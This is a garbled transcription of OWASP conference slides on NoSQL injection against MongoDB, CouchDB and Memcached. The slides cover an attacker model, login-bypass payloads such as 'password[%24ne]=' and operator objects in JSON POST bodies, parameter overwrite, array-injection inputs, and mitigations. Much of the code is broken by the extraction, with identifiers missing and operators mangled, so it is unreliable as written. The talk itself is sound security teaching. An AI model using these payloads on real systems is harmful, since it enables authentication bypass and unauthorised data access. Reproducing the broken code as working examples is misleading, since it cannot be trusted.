Transcription of NOSQL INJECTION - OWASP
1 1 NOSQL INJECTIONFUN WITH OBJECTS AND ARRAYSP atrick Spiegel2 MOTIVATION .. with MongoDB we are not building queriesfrom strings, so traditional SQL INJECTION attacksare not a MongoDB Developer FAQ3 AGENDA Scope Attacker Model Attacks Mitigation - DATABASESD atabaseTypeRankingDocument - SCOPE - TECHNOLOGY STACKWhat do we have to consider for NOSQL INJECTION ?DATABASES DATABASE DRIVERSAPPLICATION SERVERS FRAMEWORKS~ 64 TECHNOLOGY MODEL MODEL - MIGHTINESSThe attacker is aware of the deployed technology stack including application server,driver, frameworks and attacker is able to send arbitrary requests tothe server with the authorization of a normalapplication MODEL - GOALThe attacker's goal is to achieve unintended behavior of the database query byaltering query attacker is able to trigger unintended CRUD MODEL - INJECTION ATTACKERSQL Attacker Model Query languages for unstructured data Diverse system landscapes with multipledatabases Direct client-side database access via ATTACKS 'S ALREADY KNOWN?
2 Login bypass for MongoDB on PHP and NodeJS String concatenation is still an issue for JSON andscript parameters Escaping flaws of drivers Memcached Got fixed! MONGODB - LOGIN BYPASS// NodeJS with ('users').find({ "user": , "password": }); [%24ne]=// NodeJS with ('users').find({ "user": "patrick", "password": {"&ne": ""} }); - LOGIN BYPASS// PHP $collection->find(array( 'user' => $_GET['user'], 'password' => $_GET['password'] )); What's even new?# Ruby on Rails db['users'].find({ :user => ['user'], :password => ['password'] })# Python with Django ({ "user": ['user'], "password": ['password']}) - LOGIN also works for POST requests!POST /login Host: Content-Type: application/json Content-Length: 38 {'user': 'patrick', 'password': {'>': ''}}POST /login Host: Content-Type: application/x-www-form-urlencoded Content-Length: 29 user=Patrick&password[%24ne]= - PARAMETER OVERWRITE just a key-value store - what's the worst that could happen?
3 // NodeJS with ( , new Date("November 8, 2026 11:13:00").getTime() ); ../expire?key[]=foo&key[]=1117542887 Injected array overwrites all following parametersof each database function!Only NodeJS driver affected! - LOGIN BYPASS// NodeJS with function checkCredentials(user, password, callback) { var options = {'selector': {'user': user, 'password': password}}; ('users').get('_find', options, (err, res) => { callback( === 1); }); checkCredentials( , , handleResult); login?user=patrick&password[%24ne]= Inject query selector to bypass password check! - LOGIN then let's check the password within the application layer!// NodeJS with function checkCredentials(user, password, callback) { ('users').get(user, (err, res)=> { callback( === paasword); }); } checkUser( , , handleResult); Use special _all_docs document with undefinedpassword property! - CHECK BYPASSHmm .. then let's check the properties!}
4 // NodeJS with function getDocument(key, callback) { if (key === "secretDoc" || key[0] === "_") { callback("Not authorized!"); } else { ('documents').get(key, callback); } } getDocument( ); []=secretDoc []= - ARRAY INJECTION function getCache(key) { if ( ('auth_') === 0){ callback("Invalid key!"); } else { (key, (err, body)=>{ callback(err || body); }); } } getCache( , handleResult); []=auth_patrick Array INJECTION bypasses application layer checks! SUMMARYAll attacks shown with GET requests also workwith POST and PUT requests!Nearly all attacks work on NodeJS, PHP, Ruby andPython in combination with certain frameworks!Object and array INJECTION changes semantics andis key for attacks! 'S THE PROBLEM?The queries' semantic is encoded in the object ortype structure of passed parameters. {'password': '1234'} vs {'password': {'&ne': '1'}} IS TYPE CASTING A SOLUTION?{'password': ()} Secure against type manipulation Not flexible enough for unstructured data Easy to forget in practice.
5 DYNAMIC CODE ANALYSIS ASOLUTION?{user: 'Patrick', address: {city: 'Karlsruhe', code:76133}}Reduces user-controlled data to string andinteger valuesApplication-controlled CODE ANALYSISDATA VARIETY?if ( && ) { ({user: , address: }); } else if ( && ) { ({user: , phone: }); } else if .. Secure for structure manipulation Impractical for many different propertycombinations! DYNAMIC CODE ANALYSIS ASOLUTION?IMHONOB reaks existing implementations Extensive code adjustments necessaryHard to handle data variety securely
